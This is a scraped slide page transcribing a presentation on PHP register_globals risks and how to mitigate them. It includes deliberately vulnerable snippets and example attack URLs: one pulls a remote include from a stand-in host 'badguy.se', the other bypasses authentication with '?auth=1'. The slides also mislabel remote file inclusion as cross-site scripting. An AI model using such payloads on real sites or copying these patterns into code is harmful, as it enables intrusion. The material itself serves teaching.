Presentation is loading. Please wait.

Presentation is loading. Please wait.

PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables.

Published byEvangeline Wheeler Modified over 9 years ago

Similar presentations

Presentation on theme: "PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables."— Presentation transcript:

1 PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables

2 What Is register_globals ?  A directive in php.ini to automatically make variables out of environment, GET, POST, cookies, and server data (true/false)  C.f. variables_order (EGPCS)

3 Examples (Part 1) With register_globals turned on, PHP will automatically create variables $mytext and $myhide and populate them with the values entered in the form (whether GET or POST).

4 Examples (Part 2) Similarly, with the URL… http://example.com/index.php?george=jungle …PHP will create $george for you and give it the value “jungle”. Cookie, server, and environment variables such as $DOCUMENT_ROOT and $PHP_SELF are also automatically created and populated. You don’t know where the values came from (EGPCS).

5 Problems (Part 1) <?php // …some code… include “$libdir/functions.inc”; // …more code… ?> If user sets $libdir in the URL, it can override your $libdir value, allowing cross-site scripting. E.g.: http://example.com/index.php?libdir=http://badguy.se/hack

6 Problems (Part 2) <?php if ($auth == 1) { // do stuff for authorized users } else { echo “Not authorized!”; } ?> If user sets $auth in the URL, it can override your $auth value, allowing unauthenticated use. E.g.: http://example.com/index.php?auth=1

7 Solutions (Part 1)  Don’t let anyone see your code If they don’t know what variables to set, they can’t crack your script! Security-through-obscurity Does not work well, if at all  Check all variables before using them Good practice anyway Sometimes hard to check (e.g., $auth)

8 Solutions (Part 2)  Turn off register_globals ! Off by default in PHP 4.2.0 and later anyway  Use the track_vars arrays instead: $_GET $_POST $_SERVER $_FILES $_ENV $_COOKIE  Turned on by default in PHP 4.0.3 and later

9 Solution Examples (Part 1) With register_globals turned off, PHP will populate $_POST[‘mytext’] and $_POST[‘myhide’]. If the method was GET, the values are in $_GET[].

10 Solution Examples (Part 2) If a value is set in the URL… http://example.com/index.php?george=jungle … it becomes $_GET[‘george’] = “jungle” Post-method variables are in $_POST Get-method and URL variables are in $_GET Server variables are in $_SERVER Uploaded files are in $_FILES Cookie values in $_COOKIE Environment settings in $_ENV You know exactly where values are set from.

11 Use define For Path Names  If you you have to set directory paths in variables, use constants instead define(‘LIBDIR’, ‘/path/to/lib’);  Pathnames are especially dangerous in variables since they can lead directly to cross-site scripting security issues  Once set, constants cannot be redefined, making them far more secure against accidental or unexpected value resets and hack attempts

12 References  http://www.php.net/manual/en/security.registerglobals.php http://www.php.net/manual/en/security.registerglobals.php  http://www.php.net/manual/en/security.php http://www.php.net/manual/en/security.php  http://www.zend.com/zend/art/art-oertli.php http://www.zend.com/zend/art/art-oertli.php  http://www.securereality.com.au/studyinscarlet.txt http://www.securereality.com.au/studyinscarlet.txt

Download ppt "PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables."

Similar presentations

PHP Form and File Handling

PHP Form and File Handling
Cookies, Sessions. Server Side Includes You can insert the content of one file into another file before the server executes it, with the require() function.

Cookies, Sessions. Server Side Includes You can insert the content of one file into another file before the server executes it, with the require() function.
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 10 Managing State Information Using Sessions.

Chapter 10 Managing State Information Using Sessions.
PHP Form Processing. Using Forms in PHP  Two steps to process  Display the form  Process the submitted data.

PHP Form Processing. Using Forms in PHP  Two steps to process  Display the form  Process the submitted data.
©2009 Justin C. Klein Keane PHP Code Auditing Session 7 Sessions and Cookies Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 7 Sessions and Cookies Justin C. Klein Keane
PHP Security CS-422 (from The Linux Journal Oct 2002 author: Nuno Lourereio)

PHP Security CS-422 (from The Linux Journal Oct 2002 author: Nuno Lourereio)
Setting Up a Sandbox Presented by: Kevin Brunson Chief Technology Officer.

Setting Up a Sandbox Presented by: Kevin Brunson Chief Technology Officer.
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
Variables My Movie Site  The ABOVE line of code would cause the.

Variables My Movie Site  The ABOVE line of code would cause the.
PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.

PHP Tutorials 02 Olarik Surinta Management Information System Faculty of Informatics.
PHP Security.

PHP Security.
Advance Database Management Systems Lab no. 5 PHP Web Pages.

Advance Database Management Systems Lab no. 5 PHP Web Pages.
PHP : Hypertext Preprocessor

PHP : Hypertext Preprocessor
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting PHP Form Handling.

Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting PHP Form Handling.
Reading Data in Web Pages tMyn1 Reading Data in Web Pages A very common application of PHP is to have an HTML form gather information from a website's.

Reading Data in Web Pages tMyn1 Reading Data in Web Pages A very common application of PHP is to have an HTML form gather information from a website's.
ACM Web Development Workshop - PHP By Luis Torres.

ACM Web Development Workshop - PHP By Luis Torres.
Lab Assignment 7 | Web Forms and Manipulating Strings Interactive Features Added In this assignment you will continue the design and implementation of.

Lab Assignment 7 | Web Forms and Manipulating Strings Interactive Features Added In this assignment you will continue the design and implementation of.
Lecture 7 – Form processing (Part 2) SFDV3011 – Advanced Web Development 1.

Lecture 7 – Form processing (Part 2) SFDV3011 – Advanced Web Development 1.

Similar presentations

Ads by Google